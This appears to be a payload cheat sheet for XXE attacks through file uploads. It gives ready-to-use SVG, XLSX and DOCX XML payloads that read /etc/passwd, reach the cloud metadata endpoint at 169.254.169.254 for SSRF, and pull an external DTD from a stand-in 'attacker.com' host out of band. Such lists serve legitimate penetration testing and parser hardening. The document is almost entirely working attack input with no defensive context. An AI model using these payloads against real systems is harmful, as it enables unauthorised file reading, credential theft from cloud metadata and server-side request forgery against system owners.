# XXE via SVG file upload

# Basic SVG XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <text x="0" y="20">&xxe;</text>
</svg>

# SVG XXE to SSRF
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <text x="0" y="20">&xxe;</text>
</svg>

# SVG XXE OOB
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <text x="0" y="20">XXE</text>
</svg>

# XXE in XLSX (Excel) - Unzip and modify xl/workbook.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<workbook>
  <sheets>
    <sheet name="&xxe;"/>
  </sheets>
</workbook>

# XXE in DOCX (Word) - Unzip and modify [Content_Types].xml or word/document.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<document>&xxe;</document>
